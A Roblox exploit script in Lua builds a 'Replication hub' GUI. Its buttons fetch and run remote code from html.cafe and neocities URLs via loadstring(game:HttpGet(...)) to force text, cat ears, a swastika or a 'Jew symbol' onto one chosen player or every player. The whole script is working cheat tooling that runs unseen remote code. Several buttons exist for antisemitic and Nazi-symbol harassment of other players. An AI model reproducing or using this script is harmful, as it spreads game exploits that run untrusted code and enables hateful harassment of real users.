local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()

local Window = Rayfield:CreateWindow({

Name = "Replication hub",

LoadingTitle = "Replication hub",

LoadingSubtitle = "by Bananaqwdetyf :3",

ConfigurationSaving = {

Enabled = true,

FolderName = nil, -- Create a custom folder for your hub/game

FileName = "REP Hub"

},

Discord = {

Enabled = false,

Invite = "noinvitelink", -- The Discord invite code, do not include discord.gg/. E.g. discord.gg/ABCD would be ABCD

RememberJoins = true -- Set this to false to make them join the discord every time they load it up

},

KeySystem = false, -- Set this to true to use our key system

KeySettings = {

Title = "Untitled",

Subtitle = "Key System",

Note = "No method of obtaining the key is provided",

FileName = "Key", -- It is recommended to use something unique as other scripts using Rayfield may overwrite your key file

SaveKey = true, -- The user's key will be saved, but if you change the key, they will be unable to use your script

GrabKeyFromSite = false, -- If this is true, set Key below to the RAW site you would like Rayfield to get the key from

Key = {"Hello"} -- List of keys that will be accepted by the system, can be RAW file links (pastebin, github etc) or simple strings ("hello","key22")

}

})

local Wacky = Window:CreateTab("Scripts", 4483362458) -- Title, Image

-- Build the player list

local players = game.Players:GetPlayers()

local options = {}

for _, plr in ipairs(players) do

table.insert(options, plr.DisplayName .. " (@" .. plr.Name .. ")")

end

local ffff = {}

for _, plr in ipairs(players) do

table.insert(ffff, plr.Name)

end

-- Create the dropdown

local Dropdown = Wacky:CreateDropdown({

Name = "Players",

Options = options,

CurrentOption = {},

MultipleOptions = false,

Flag = "Dropdown1",

Callback = function(Option)

local selectedText = Option[1]

-- Extract username from "DisplayName (@Username)"

local username = selectedText:match("@(.-)%)")

-- Convert username → actual Player instance

local selectedPlayer = game.Players:FindFirstChild(username)

-- Notify the user

Rayfield:Notify({

Title = "Players",

Content = "Picked " .. selectedText .. "!",

Duration = 3.5,

Image = 4483362458,

Actions = {

Ignore = {

Name = "Okay!",

Callback = function()

print("The user tapped Okay!")

end

},

},

})

getgenv().Player = selectedPlayer

end,

})

local players = game.Players:GetPlayers()

local Input = Wacky:CreateInput({

Name = "Text for player",

PlaceholderText = "Input text....",

RemoveTextAfterFocusLost = false,

Callback = function(sure)

getgenv().PlayerText = sure

end,

})

local Button = Wacky:CreateButton({

Name = "Text on player",

Callback = function()

loadstring(game:HttpGet('https://html.cafe/x30e7990e'))()

end,

})

local Button = Wacky:CreateButton({

Name = "Text on All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

loadstring(game:HttpGet("https://html.cafe/x30e7990e"))()

end

end,

})

local Button = Wacky:CreateButton({

Name = "Reset Text player",

Callback = function()

getgenv().PlayerText = ""

loadstring(game:HttpGet('https://html.cafe/x30e7990e'))()

end,

})

local Button = Wacky:CreateButton({

Name = "Reset Text All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

getgenv().PlayerText = ""

loadstring(game:HttpGet("https://html.cafe/x30e7990e"))()

end

end,

})

local Button = Wacky:CreateButton({

Name = "✡️ Jew symbol on player",

Callback = function()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/test4.txt'))()

end,

})

local Button = Wacky:CreateButton({

Name = "✡️ Jew symbol on All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/test4.txt"))()

end

end,

})

local Button = Wacky:CreateButton({

Name = "✡️ Spinning Jew symbol on player",

Callback = function()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/test3.txt'))()

end,

})

local Button = Wacky:CreateButton({

Name = "✡️ Spinning Jew symbol on All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/test3.txt"))()

end

end,

})

local Button = Wacky:CreateButton({

Name = "Spinning Swasika symbol on player",

Callback = function()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/test5.txt'))()

end,

})

local Button = Wacky:CreateButton({

Name = "😺 Cat ears player",

Callback = function()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/catears.txt'))()

end,

})

local Button = Wacky:CreateButton({

Name = "😺 Cat ears All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/catears.txt"))()

end

end,

})

local Button = Wacky:CreateButton({

Name = "😺 Cat tail player",

Callback = function()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/cattail.txt'))()

end,

})

local Button = Wacky:CreateButton({

Name = "😺 Cat tail All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/cattail.txt"))()

end

end,

})

local Button = Wacky:CreateButton({

Name = "😺 FURRY MODE Player",

Callback = function()

getgenv().PlayerText = "FURRY"

loadstring(game:HttpGet("https://html.cafe/x30e7990e"))()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/catears.txt'))()

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/cattail.txt"))()

end,

})

local Button = Wacky:CreateButton({

Name = "😺 FURRY MODE All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

getgenv().PlayerText = "FURRY"

loadstring(game:HttpGet("https://html.cafe/x30e7990e"))()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/catears.txt'))()

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/cattail.txt"))()

end

end,

})

local Button = Wacky:CreateButton({

Name = "😺 Cat Player",

Callback = function()

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/catears.txt'))()

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/cattail.txt"))()

end,

})

local Button = Wacky:CreateButton({

Name = "😺 Cat All",

Callback = function()

for _, plr in ipairs(players) do

getgenv().Player = plr

loadstring(game:HttpGet('https://scho0l-stuff.neocities.org/catears.txt'))()

loadstring(game:HttpGet("https://scho0l-stuff.neocities.org/cattail.txt"))()

end

end,

})